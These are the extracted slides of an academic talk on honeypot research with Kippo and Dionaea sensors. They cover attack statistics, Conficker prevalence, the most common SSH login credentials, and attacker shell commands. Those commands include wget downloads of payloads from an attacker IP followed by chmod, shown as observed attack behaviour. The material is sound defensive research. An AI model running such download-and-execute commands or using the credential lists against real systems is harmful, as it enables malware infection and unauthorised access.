Study of Internet Threats and Attacks Methods Using Honeypots and

Honeynets

Tomas Sochor & Matej ZuzcakUniversity of Ostrava

Department of Informatics and Computers

PresentationContents1. Introduction.2. Honeypot and honeynet classification.3. Research methods.4. Sensors used for the study.5. Honeynet topology.6. Results:

– Linux SSH shell emulation (Kippo),– Windows emulation (Dionaea).

7. Comparison of sensor attractiveness.8. Conclusions.

Honeypot and Honeynet Classification

− Honeypot (L. Spitzner, 2003)Safety feature - "lure" for attackers:

– lures for attacks,– captured attacks can be analyzed in detail.

– Basic classification based on activity:– passive (server honeypots),− active (client honeypots).

− Basic classification according to the level of their interaction:− low/(medium) interaction honeypots,− high-interaction honeypots.

Honeypot and Honeynet Classification• Accordingproductionview:(importantclassification)– Productive honeypots

• Shadow honeypots

– Research honeypots

HoneypotPurpose• Obtaining information about:

– Most widespread threats or attacks in our area. – New threats and attacks.

• Why is it important?– Improve detection and defence.

• „Keep up with the attackers...“– Comparing attractivity of different networks for

attackers, actual trends• detection of potential new threats

Honeynet Classification

• Honeynet = (logical) network of several honeypots– either connected to a single physical network– or to multiple networks interconnected using the

Internet).

Honeypot Projects - Current State− Honeypot results are seldom published.− Published data:

− few details,− often outdated.

− Further more detailed analysis is not possible.− Numerous closed community honeypots

− data can be shared only among members.− National and European institutions

− CERT and CSIRT teams, ENISA:− Researchandretrievingdatarunbyprivatebodies,

− mostlyinnon-publicmode(e.g.armedforces).− Onlyfewprojectsarepubliclyavailable

− mostofthemnotfocusedprimarilytohoneypots,− Someprojectspublicelementarystatisticaloutputs,

example:denyhosts,Dshield.org

Study Research Methods− Low-interaction honeynet:

− Windows honeypot sensor – Dionaea:− emulation of specific protocols and vulnerabilities,− primary goal is to capture and analyze binary files

(malware).− Linux honeypot sensor – Kippo:

− emulation of SSH shell (network port 22),− primary goal is monitor the activities of the attacker,

who is remotely connected to the system.

Low-interaction Honeynet Topology

Distribution and Implementation of Sensors

− Sensors with low-interaction:− Dionaea: OSU (ČR), VPS Prague (ČR), Kysucké Nové mesto

(SR),− Kippo: VPS Prague (ČR).

− Modifications Dionaea and Kippo implementations:− Malware identification propagated into central database

− Evaluating data.− Analysis of the data.− Comparison of results among sensors.− Sensors’ attractiveness in academic networks is low

− almost insufficient.

Dionaeahoneypotsensor– OSU,CESNETNumberofallconnectionsinthedirectiontohoneypotduringoneday:

Downloadedfilesduringoneday:

Dionaeahoneypotsensor – VPSPrahaNumberofallconnectionsinthedirectiontohoneypotduringoneday:

Downloadedfilesduringoneday:

Dionaeahoneypotsensor – SR,SANETNumberofallconnectionsinthedirectiontohoneypotduringoneday:

Downloadedfilesduringoneday:

2125,11=x

789,62=x

241,90=x

28635,4869064,48

==sx

0

1000

2000

3000

4000

5000

6000

7000

8000

1.11.2013 1.12.2013 1.1.2014 1.2.2014 1.3.2014

0

5000

10000

15000

20000

25000

30000

35000

1.11.2013 1.12.2013 1.1.2014 1.2.2014 1.3.2014

020000400006000080000100000120000140000160000180000

1.11.2013 1.12.2013 1.1.2014 1.2.2014 1.3.2014

0,15=x

Dionaea – Windows attacks analysis

10 the most active IP addresses for the period under review

Dionaea – Windows attacks analysis

− Number of unique samples (according MD5): 1440− Number of unknown samples (acc. Virustotal.com): 16− Conficker network worm

− the most frequently spread threat captured −99,99933%from all malware−RPC execution via buffer overflow

−originated Nov. 2008!−lots of new polymorphic variants

Operation system

Number of connections

Windows 9 123 795

Neznámy 114 928

Linux 4 736

SunOS 454

Local port Number of accepted connections

445 9 141 64080 26 6041433 15 6453306 11 55221 7300 500000 1000000 1500000

Win32/Conficker.AA

Win32/Conficker.AE

Win32/Conficker.AL

Win32/Conficker.X

Kippo – Linux attack statisticsNumber of attemptstoconnect to SSH shell. During one day:

Number of successful attemptstoconnect to SSH shell (login). During one day:

280.636603.793

==sx

877.4792.10

==sx

Kippo – Linux attacks analysisThe10topIPaddresseswiththehighestnumberofconnections.

Activityofindividualcountriesaccordingnumberofconnections.Total number of attempts to connect : 42 061Number of unique attacker IP addresses: 427

Kippo - attacks analysis• SSHclientsusedbyattackers

– majorityofbotnet’sactivity

Kippo – Linux attacks analysis

Name Password Countroot admin 653root 123456 306root Password 119root !QAZ@WSX 112root - 96admin password 91root Abc123 89root Password123 89root p@ssw0rd 86admin passw0rd 85

Themostcommonlogindata

ThemostcommonactivitiesinemulatedsystemSSH shell inputpwdlschmod 0775 .TSmls -lchmod 0775 .Mm2unameuname -aexitwget http://216.99.158.70:8090/.TSmwget http://216.99.158.70:8090/.Mm2

Low-interaction honeynet - conclusions

− Difficult comparison with other studies.− Results comparison:

− in rough accordance with CZ-NIC, CERT-PL.− Indifferent approach to installing security updates.− Missing elementary safety features and habits.− Obtaining a detailed statistical overview of current trends in

security threats.− Potential detection of new threats.− Obtained data can be used for the purpose of updating and

disseminating blacklist firewalls / IPS systems.

Honeypots and IPv6 protocol– IPv6 honeypots connected to the Internet are still

ineffective:− The huge range of IPv6 addresses, scan is pointless.− The best promoting example:

− domains in form ipv6.xxx.xx.− Honeypot tested in experimental IPv6 LAN

− could be useful for “dormant” IPv6 network.− Currently IPv6 protocol is supported directly only Dionaea

honeypot implementation.− IPv6 support in Kippo is probably possible with external patch.

Conclusion and further research− Honeypots and honeynets are needed:

− Results indicate continuous occurrence earlier attacks.− Provide an overview of current trends, the possibility of detecting

new attacks and other research with of the obtained data.− Future research:

− In present we focus mainly to high-interaction honeypots.− We are planning research with SCADA honeypots.− We are expanding our research network of low-interaction

honeypots (low-interaction honeynet) for more relevant data too.

− We want do deeper research on local networks too and do research with client honeypots in the future.

Acknowledgments• Forprovidedhardwareandconnection:

– UniversityofOstrava• InformationTechnologyCentre

– Spojena skola vKysuckomNovomMeste,SK• Forexpertconsulting:

– TheHoneynet Project,CzechChapter– CZ-NIC

Thanksforyourattention

Anyquestions?

tomas.sochor@osu.czmzuzcak@secit.sk